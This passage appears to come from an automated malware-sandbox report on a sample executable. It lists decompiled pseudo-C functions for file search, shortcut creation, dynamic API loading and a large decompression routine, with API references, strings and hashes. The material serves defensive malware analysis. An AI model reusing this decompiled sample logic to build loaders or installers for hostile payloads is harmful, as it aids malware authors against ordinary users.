                                                                      • lstrcatA.KERNEL32(?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 00405358
                                                                      • lstrlenA.KERNEL32(?,?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040535E
                                                                      • FindFirstFileA.KERNEL32(0042B490,?,?,?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040536F
                                                                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405421
                                                                      • FindClose.KERNEL32(?), ref: 00405432
                                                                      Strings
                                                                      • \*.*, xrefs: 0040533F
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 004052E9
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405315
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-1463722233
                                                                      • Opcode ID: d2c76cd9e628d8186c0b895e2dc83b54db85f20e7ce0a50c644a367ebea546ed
                                                                      • Instruction ID: ef095529ff986d63dc264fe90b6339a07cda3a46ea2ad7dd50420250dcb54f18
                                                                      • Opcode Fuzzy Hash: d2c76cd9e628d8186c0b895e2dc83b54db85f20e7ce0a50c644a367ebea546ed
                                                                      • Instruction Fuzzy Hash: 8641B0B0404A18BADB21AB718C86BEF3A68DF01359F14857BB945B51D3C67C8DC18E6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405C6C, Relevance: 6.0, APIs: 4, Instructions: 24fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405C6C(CHAR* _a4) {
				void* _t8;

				SetErrorMode(0x8001);
				_t8 = FindFirstFileA(_a4, 0x42c4d8);
				SetErrorMode(0);
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8);
				return 0x42c4d8;
			}




                                                                      0x00405c7a
                                                                      0x00405c8e
                                                                      0x00405c90
                                                                      0x00405c95
                                                                      0x00000000
                                                                      0x00405ca2
                                                                      0x00405c98
                                                                      0x00000000

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00008001,00000000,0042B890,?,004055C0,0042B890,0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ), ref: 00405C7A
                                                                      • FindFirstFileA.KERNEL32(?,0042C4D8), ref: 00405C86
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00405C90
                                                                      • FindClose.KERNEL32(00000000), ref: 00405C98
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFindMode$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2885216544-0
                                                                      • Opcode ID: 055ceda7cfb7593c2ca12c0ec91b25e43900224e0777ef4bda6e37e64f0dcbc7
                                                                      • Instruction ID: 3d4d6c253e85b88ebba290a8a0e03fa066f01ceea9dc36e60308c04f6099b6be
                                                                      • Opcode Fuzzy Hash: 055ceda7cfb7593c2ca12c0ec91b25e43900224e0777ef4bda6e37e64f0dcbc7
                                                                      • Instruction Fuzzy Hash: F4E0CD32B486206BD20027B56E88D1B3A5CDFC5721F144133B200F62D0C5B55C018BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004020A3, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 74%
                                                                      			E004020A3() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9D(0xfffffff0);
				_t96 = E00402A9D(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9D(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9D(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9D(0x45);
				if(E00405509(_t96) == 0) {
					E00402A9D(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407428, _t75, 1, 0x407418, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407438, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x4093e0 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x4093e0, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x4093e0, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                      0x004020ac
                                                                      0x004020b6
                                                                      0x004020bf
                                                                      0x004020c9
                                                                      0x004020d2
                                                                      0x004020dc
                                                                      0x004020e0
                                                                      0x004020e0
                                                                      0x004020e5
                                                                      0x004020f6
                                                                      0x004020fe
                                                                      0x004021dc
                                                                      0x004021dc
                                                                      0x004021e3
                                                                      0x00402104
                                                                      0x00402104
                                                                      0x00402115
                                                                      0x00402119
                                                                      0x0040211f
                                                                      0x00402129
                                                                      0x0040212b
                                                                      0x00402136
                                                                      0x00402139
                                                                      0x00402146
                                                                      0x00402148
                                                                      0x0040214a
                                                                      0x00402151
                                                                      0x00402154
                                                                      0x00402154
                                                                      0x00402157
                                                                      0x00402161
                                                                      0x00402169
                                                                      0x0040216e
                                                                      0x0040217a
                                                                      0x0040217a
                                                                      0x0040217d
                                                                      0x00402186
                                                                      0x00402189
                                                                      0x00402192
                                                                      0x00402197
                                                                      0x004021a9
                                                                      0x004021b2
                                                                      0x004021b8
                                                                      0x004021c4
                                                                      0x004021c4
                                                                      0x004021c6
                                                                      0x004021cc
                                                                      0x004021cc
                                                                      0x004021cf
                                                                      0x004021d5
                                                                      0x004021da
                                                                      0x004021ef
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004021da
                                                                      0x004021e5
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407428,?,00000001,00407418,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F6
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093E0,00000400,?,00000001,00407418,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B2
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040212E
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 123533781-501415292
                                                                      • Opcode ID: c6f65dcf336bb5dd551021bf91646b932be3072b4551db8ca50a3f1fa06c84dd
                                                                      • Instruction ID: 3ed110bf0786c02e8884ace9c02211f00dfd8f88c36098b7f48f2011d4953916
                                                                      • Opcode Fuzzy Hash: c6f65dcf336bb5dd551021bf91646b932be3072b4551db8ca50a3f1fa06c84dd
                                                                      • Instruction Fuzzy Hash: FB417F75A00215BFCB00EFA4CD88E9D7BBAEF48354B20456AF905EB2D1CB759D41CB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405CAA, Relevance: 4.5, APIs: 3, Instructions: 12libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405CAA(CHAR* _a4, CHAR* _a8) {
				struct HINSTANCE__* _t4;

				_t4 = GetModuleHandleA(_a4);
				if(_t4 != 0) {
					L2:
					return GetProcAddress(_t4, _a8);
				}
				_t4 = LoadLibraryA(_a4);
				if(_t4 != 0) {
					goto L2;
				}
				return _t4;
			}




                                                                      0x00405cae
                                                                      0x00405cb6
                                                                      0x00405cc6
                                                                      0x00000000
                                                                      0x00405ccb
                                                                      0x00405cbc
                                                                      0x00405cc4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405cd1

                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                      • LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                      • String ID:
                                                                      • API String ID: 310444273-0
                                                                      • Opcode ID: e4b61fa6f5159826fb47f49255b6dc6a3715f4bc3db61b7d7797ec1f11eff99d
                                                                      • Instruction ID: 33d1b8fa5dc3d2f461b27e07447732d314f4b7f1c5b6ea1df08c89d6f7ec294a
                                                                      • Opcode Fuzzy Hash: e4b61fa6f5159826fb47f49255b6dc6a3715f4bc3db61b7d7797ec1f11eff99d
                                                                      • Instruction Fuzzy Hash: 47D09230A0C301ABDB111F20DF0990B7AA9AB90781B044839B045E52B0D735D850EA2A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004026B9, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 39%
                                                                      			E004026B9(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9D(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405902(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059A4();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                                                      0x004026d1
                                                                      0x004026e5
                                                                      0x004026f0
                                                                      0x004026f1
                                                                      0x00402858
                                                                      0x004026d3
                                                                      0x004026d3
                                                                      0x004026d5
                                                                      0x004026d7
                                                                      0x004026d7
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 0624d6b46ab18f0b9b7ad3cd879cd3c4943d2122b08aabc274a81147faaa1269
                                                                      • Instruction ID: 48b8645060a309c8c5223ed75caab456a314ca5961bde3a44afc719425e93c56
                                                                      • Opcode Fuzzy Hash: 0624d6b46ab18f0b9b7ad3cd879cd3c4943d2122b08aabc274a81147faaa1269
                                                                      • Instruction Fuzzy Hash: B2F0A772A45110DEDB00E7A49D499FE7768DF21324F60457BE141F21C1C6B84945DA6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406095, Relevance: .3, Instructions: 334COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E00406095(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406804( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x40730c; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x40730c; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040686C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004067C4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x4093b0 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x4093b0 + __eax * 2) & 0x0000ffff =  *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x4093b0 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x4093b0 + __eax * 2) & 0x0000ffff =  *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x4093b0 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406804( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
